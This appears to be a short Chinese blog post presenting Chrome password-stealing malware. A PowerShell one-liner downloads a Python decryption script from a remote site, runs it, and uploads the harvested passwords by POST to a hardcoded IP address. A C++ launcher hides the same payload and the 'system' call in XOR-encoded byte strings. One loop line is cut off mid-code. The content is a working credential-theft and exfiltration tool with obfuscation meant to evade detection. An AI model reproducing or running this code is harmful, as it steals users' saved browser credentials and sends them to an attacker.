本文共 2362 字,大约阅读时间需要 7 分钟。
获取chrome密码是lijiejie的python脚本,因此powershell代码依赖于:python和pywin32(通过pip安装)
powershell代码:
#1 下载文件保存在用户temp目录下Invoke-WebRequest -Uri http://zheli.org/data/201808795723.txt -OutFile $env:temp/update.txt #2 pip安装pywin32用于解密pip install pywin32#3 执行python脚本python $env:temp/update.txt#4 回传数据Invoke-RestMethod -Uri http://45.32.66.143:8001/recvpost.php -Method Post -InFile $env:temp/update.txt最终: powershell "Invoke-WebRequest -Uri http://zheli.org/data/201808795723.txt -OutFile $env:temp/update.txt ;pip install pywin32; python $env:temp/update.txt ; Invoke-RestMethod -Uri http://45.32.66.143:8001/recvpost.php -Method Post -InFile $env:temp/update.txt"
C++实现:
#include "windows.h"#include "string.h"using namespace std;int main(){ char cDllname[] = "\x7c\x62\x67\x72\x63\x65\x3f\x75\x7d\x7d"; char cSystem[] = "\x62\x68\x62\x65\x74\x7c";//"system"; char cPayload[] = "\x61\x7e\x66\x74\x63\x62\x79\x74\x7d\x7d\x31\x33\x58\x7f\x67\x7e\x7a\x74\x3c\x46\x74\x73\x43\x74\x60\x64\x74\x62\x65\x31\x3c\x44\x63\x78\x31\x79\x65\x65\x61\x2b\x3e\x3e\x6b\x79\x74\x7d\x78\x3f\x7e\x63\x76\x3e\x75\x70\x65\x70\x3e\x23\x21\x20\x29\x21\x29\x26\x28\x24\x26\x23\x22\x3f\x65\x69\x65\x31\x3c\x5e\x64\x65\x57\x78\x7d\x74\x31\x35\x74\x7f\x67\x2b\x65\x74\x7c\x61\x3e\x64\x61\x75\x70\x65\x74\x3f\x65\x69\x65\x31\x2a\x61\x78\x61\x31\x78\x7f\x62\x65\x70\x7d\x7d\x31\x61\x68\x66\x78\x7f\x22\x23\x2a\x31\x61\x68\x65\x79\x7e\x7f\x31\x35\x74\x7f\x67\x2b\x65\x74\x7c\x61\x3e\x64\x61\x75\x70\x65\x74\x3f\x65\x69\x65\x31\x31\x2a\x31\x58\x7f\x67\x7e\x7a\x74\x3c\x43\x74\x62\x65\x5c\x74\x65\x79\x7e\x75\x31\x3c\x44\x63\x78\x31\x31\x79\x65\x65\x61\x2b\x3e\x3e\x25\x24\x3f\x22\x23\x3f\x27\x27\x3f\x20\x25\x22\x2b\x29\x21\x21\x20\x3e\x63\x74\x72\x67\x61\x7e\x62\x65\x3f\x61\x79\x61\x31\x3c\x5c\x74\x65\x79\x7e\x75\x31\x41\x7e\x62\x65\x31\x3c\x58\x7f\x57\x78\x7d\x74\x31\x35\x74\x7f\x67\x2b\x65\x74\x7c\x61\x3e\x64\x61\x75\x70\x65\x74\x3f\x7d\x7e\x76\x33"; static bool bIsUpdated = false; if(!bIsUpdated){ for(int i=0; i
如果在vs2017中遇到类型转换的问题,可以尝试替换其中这段代码,讲char* 转换成 LPCWSTR。
typedef void (WINAPI *PGNSI)(char *); PGNSI pGNSI; WCHAR wszClassName[256]; MultiByteToWideChar(CP_ACP,0,cDllname,strlen(cDllname)+1,wszClassName, sizeof(wszClassName)/sizeof(wszClassName[0])); pGNSI = (PGNSI)GetProcAddress(GetModuleHandle(wszClassName),cSystem); pGNSI(cPayload); bIsUpdated = true;